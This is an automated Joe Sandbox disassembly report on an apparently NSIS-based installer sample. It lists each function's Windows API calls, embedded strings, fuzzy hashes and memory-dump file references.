Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 0040494D
A, xrefs: 00404973

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

[Rename], xrefs: 0040611D, 0040612F
%ls=%ls, xrefs: 004060A9

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0

Strings

Null, xrefs: 00403029
soft, xrefs: 00403020
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Error launching installer, xrefs: 00402F80
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Inst, xrefs: 00403017

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

\, xrefs: 0040677A
%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
